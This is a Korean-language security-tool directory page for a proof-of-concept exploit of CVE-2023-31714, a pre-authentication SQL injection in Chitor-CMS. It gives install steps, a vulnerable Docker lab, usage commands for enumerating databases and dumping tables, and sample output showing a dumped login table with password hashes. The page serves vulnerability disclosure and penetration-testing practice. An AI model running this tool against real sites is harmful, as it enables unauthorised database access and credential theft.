Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2023-31714 — CVE-2023-31714에 대한 개념 증명(PoC) 익스플로잇, Chitor-CMS < 1.1.2에서 사전 인증 SQL 인젝션 취약점입니다. /edit_school.php 엔드포인트를 통해 데이터베이스 열거 및 자격 증명 덤프를 자동화합니다. | Kitploit
도구/GitHubGitHub/msd0pe-1/cve-2023-31714
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingDatabase Security
GitHubmsd0pe-1/cve-2023-31714

CVE-2023-31714

CVE-2023-31714에 대한 개념 증명(PoC) 익스플로잇, Chitor-CMS < 1.1.2에서 사전 인증 SQL 인젝션 취약점입니다. /edit_school.php 엔드포인트를 통해 데이터베이스 열거 및 자격 증명 덤프를 자동화합니다.

저장소 보기
125개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2023-31714 - Chitor-CMS < 1.1.2 사전 인증 SQL 인젝션

발견: msd0pe
https://github.com/waqaskanju/Chitor-CMS
프로젝트: waqaskanju

chitor1.1.py (69d3442 커밋 이후 패치됨)

2023/04/13
SQL 인젝션이 /edit_school.php?id= 엔드포인트에서 발견되었으며, 인증이 필요하지 않습니다.

chitor1.0.py (5f76192 커밋 이후 사후 인증 SQL 인젝션으로 변경됨)

2023/04/09
SQL 인젝션이 /add_school_class.php?school= 등 여러 엔드포인트에서 발견되었으며, 인증이 필요하지 않았습니다. 5f76192 커밋 이후로 이 엔드포인트들은 로그인한 사용자에게 편집 권한이 있는지 확인합니다. 이 확인은 이전에도 있었지만 기능하지 않았습니다.

설치

root@kitploit:~
sudo apt install git virtualenv python3 python3-pip docker-compose
git clone https://github.com/msd0pe-1/cve-2023-31714
virtualenv -p python3 venv
source venv/bin/activate
pip3 install requests prettytable

TO START THE VULNERABLE DOCKER:
  - sudo ./run.sh [1.0|1.1]
TO STOP AND CLEAN THE DOCKER:
  - sudo ./clean.sh

사용법

root@kitploit:~
Usage: python chitor1.1.py [options]

Options:
  --version             show program's version number and exit
  -h, --help            show this help message and exit
  -u URL, --url=URL     target url
  --dbs                 list databases
  -D DATABASE, --db=DATABASE
                        select a database
  --tables              list tables
  -T TABLE, --table=TABLE
                        select a table
  --dump                dump the content

  Examples:
    python3 chitor1.1.py -u http://127.0.0.1 --dbs
    python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db --tables
    python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db -T login --dump

  Chitor-CMS < 1.1.2 Pre-Auth SQL Injection.
  Source code put in public domain by msd0pe,no Copyright
  Any malicious or illegal activity may be punishable by law
  Use at your own risk

예제

root@kitploit:~
python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db -T login --dump
+----+-------------+------------+----------------------------------+--------+
| Id | Employee_Id | User_Name  |             Password             | Status |
+----+-------------+------------+----------------------------------+--------+
| 1  |      1      |   Guest    | adb831a7fdd83dd1e2a309ce7591dff8 |   1    |
| 2  |      2      | waqaskanju | ################################ |   1    |
| 3  |      3      |   admin    | 21232f297a57a5a743894a0e4a801fc3 |   1    |
+----+-------------+------------+----------------------------------+--------+
도구 다운로드